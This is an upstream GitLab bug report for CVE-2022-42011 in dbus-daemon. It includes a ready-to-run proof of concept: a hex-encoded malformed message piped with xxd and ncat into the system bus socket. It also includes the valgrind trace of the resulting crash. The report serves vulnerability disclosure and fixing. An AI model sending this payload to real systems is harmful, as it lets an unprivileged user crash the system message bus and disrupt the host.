Skip to content
GitLab
Closed
Issue created by Evgeny Vereshchagin@evverxContributor

CVE-2022-42011: dbus-daemon can be crashed by messages with array length inconsistent with element type

To reproduce

It can be reproduced on Debian Bookworm with dbus-daemon-1.14.0-2 by running the following command as a non-root user:

cat <<'EOL' | xxd -ps -r | ncat -U /run/dbus/system_bus_socket
00415554482045585445524e414c0d0a444154410d0a424547494e0d0a6c
40ff0100000000f60059df18010000521161286128797979797979797929
796174290000010000d800000000000000016f5d00000000000001560244
7265656465736b000017f60059df20dfff09a9116120612879717900d842
e92f6f726765656420202020202020200020202020202020202020202020
202020202020b00024000000000000e6dfdfdf2020202065000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000028757987ff27b5e9d90100005e304b7900016f
2d5d67446f724444726565640017656b7300f60059ffa911612061287971
fd7eeeff010000000000001067c8c8c8c8c8c8c801000000000000050000
000000faff0000000000000000000000001200000000000000
EOL

Expected result

dbus-daemon shouldn't crash.

Actual result

==29956== Invalid read of size 8
==29956==    at 0x4888CF4: UnknownInlinedFun (byteswap.h:73)
==29956==    by 0x4888CF4: _dbus_marshal_read_basic (dbus-marshal-basic.c:582)
==29956==    by 0x48738DC: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2612)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x4873BD7: _dbus_type_writer_write_reader_partial.isra.0 (dbus-marshal-recursive.c:2698)
==29956==    by 0x4873D17: replacement_block_replace (dbus-marshal-recursive.c:1197)
==29956==    by 0x4873EDD: _dbus_type_reader_delete (dbus-marshal-recursive.c:1434)
==29956==    by 0x4871F43: _dbus_header_remove_unknown_fields (dbus-marshal-header.c:1559)
==29956==  Address 0x5005300 is 0 bytes after a block of size 608 alloc'd
==29956==    at 0x484582F: realloc (vg_replace_malloc.c:1437)
==29956==    by 0x4889454: reallocate_for_length (dbus-string.c:397)
==29956==    by 0x4889454: set_length (dbus-string.c:438)
==29956==    by 0x4871F30: reserve_header_padding (dbus-marshal-header.c:100)
==29956==    by 0x4871F30: _dbus_header_remove_unknown_fields (dbus-marshal-header.c:1556)
==29956==    by 0x11FA4F: bus_dispatch (dispatch.c:293)
==29956==    by 0x11FA4F: bus_dispatch_message_filter (dispatch.c:559)
==29956==    by 0x486C9C6: dbus_connection_dispatch (dbus-connection.c:4703)
==29956==    by 0x486C9C6: dbus_connection_dispatch (dbus-connection.c:4574)
==29956==    by 0x12BE98: _dbus_loop_dispatch (dbus-mainloop.c:532)
==29956==    by 0x12BE98: _dbus_loop_dispatch (dbus-mainloop.c:513)
==29956==    by 0x12BE98: _dbus_loop_iterate (dbus-mainloop.c:862)
==29956==    by 0x12C274: _dbus_loop_run (dbus-mainloop.c:888)
==29956==    by 0x112C99: main (main.c:750)
==29956==
==29956==
==29956== Process terminating with default action of signal 11 (SIGSEGV): dumping core
==29956==  Access not within mapped region at address 0x5356000
==29956==    at 0x4888CF4: UnknownInlinedFun (byteswap.h:73)
==29956==    by 0x4888CF4: _dbus_marshal_read_basic (dbus-marshal-basic.c:582)
==29956==    by 0x48738DC: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2612)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x4873BD7: _dbus_type_writer_write_reader_partial.isra.0 (dbus-marshal-recursive.c:2698)
==29956==    by 0x4873D17: replacement_block_replace (dbus-marshal-recursive.c:1197)
==29956==    by 0x4873EDD: _dbus_type_reader_delete (dbus-marshal-recursive.c:1434)
==29956==    by 0x4871F43: _dbus_header_remove_unknown_fields (dbus-marshal-header.c:1559)

[I've edited the title of this issue report to clarify the scope of the initial issue reported by @evverx and distinguish it from #418 (closed). -@smcv]

Edited by Simon McVittie